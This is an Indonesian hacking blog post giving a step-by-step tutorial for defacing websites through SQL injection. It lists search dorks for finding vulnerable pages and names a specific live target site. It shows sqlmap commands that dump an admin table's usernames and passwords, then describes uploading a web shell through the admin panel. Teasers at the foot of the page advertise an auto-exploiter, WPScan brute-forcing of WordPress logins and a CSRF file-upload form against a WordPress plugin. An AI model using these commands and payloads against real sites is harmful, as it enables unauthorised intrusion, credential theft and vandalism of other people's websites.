Skip to main content

Deface Dengan Metode SQLmap + kumpulan web vuln nya

Image
By
Assalamualaikum sob (^_^)

kali ini saia mau share tutor DEFACE dengan metode SQLMAP

untuk user windows bisa download alatnya di sini :

Sqlmap  bisa download disini
Python bisa download disini


dork:

inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=

 Atau KLIK DISINI  untuk kumpulan web vuln nya :)

OK, sekarang kita mulai.....

PERHATIKAN SETIAP LANGKAH DENGAN BAIK!!!!!

  1. Buka cmd kalian, dan pindahkan ke directory kalian simpan folder sqlmap nya.


2.  Kalian pilih salah satu target dari Kumpulan web vuln tadi,
 Misal saya pilih target  " http://alwaysvegetarian.com/detail.php?id=18 "
ketikan di cmd nya tadi 
sqlmap.py -u http://www.target.co.li/index.php?id=1 --dbs [enter]
keterangan :
warna merah adlah perintahnya
warna hijau adalah target kalian


3. Tunggu hingga proses selesai....
kalo sudah selesai, maka akan keluar database nya :)

Sekarang kita sudah dapat database nya, lalu langkah selanjutnya adalah membuka tabel dari database nya tersebut, untuk membuka,, kita masukan perintah :

sqlmap.py -u http://alwaysvegetarian.com/detail.php?id=18 -D id2223825_db_dimitri --tables [enter]

keterangan :
warna merah adlah perintahnya
warna hijau adlah targetnya
warna biru adlah database yang mau dibuka

4. tunggu proses hingga selesai......
Maka kita temukan ada 2 tabels dari database tersebut

Sekarang kita akan membuka tabels untuk mendapatkan coloumns nya,,, dengan perintah :

sqlmap.py -u http://alwaysvegetarian.com/detail.php?id=18 -D id2223825_db_dimitri  -T admin --columns [enter]

keterangan :
warna merah adlah perintahnya
warna hijau adlah targetnya
warna biru adlah database yang tadi
warna pink adalah tabels yang akan kita buka

5. Tunggu Proses hingga selesai.....
Kita Temukan ada 3 clumns di tabels tersebut....

sekarang kita akan buka columns tersebut, supaya kita dapatkan username dan password nya :D
kita ketikan perintah :


sqlmap.py -u http://alwaysvegetarian.com/detail.php?id=18 -D id2223825_db_dimitri  -T admin --dump [enter]


keterangan :
warna merah adlah perintahnya
warna hijau adlah targetnya
warna biru adlah database yang tadi
warna pink adalah tabels 

6. Kalo sudah ketemu username dan password nya, sekarang kita cari admin login nya, (gunakan logika anda :v)

7. kalo sudah masuk....
kita akan membuat artikel, isi artikel nya bebas :v

di colom choose file, pilih shell kalian..
kalo sudah klik kirim



8. Akses Shell??
Biasanya di http://target.co.li/images/nama_shell_lu.php
lalu login ke shell kalian

9. ini tampilan shell nya

Kalo sudah masuk shell, Terserah mau kalian
kalo mau ngindex, kita sebagai defacer yang baik :D jangan lupa untuk dibackup  dulu:)


live target : http://alwaysvegetarian.com/


Jangan lupa titip nick saia Mr.r1i14z

THANKS FOR v3rluchie and P4kLonc4t
















Labels:

Comments

Post a Comment

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

By
squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...
5 comments
Read more

Deface Wordpress Bruteforce dengan WPScan

By
squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...
Post a Comment
Read more

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

By
www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...
Post a Comment
Read more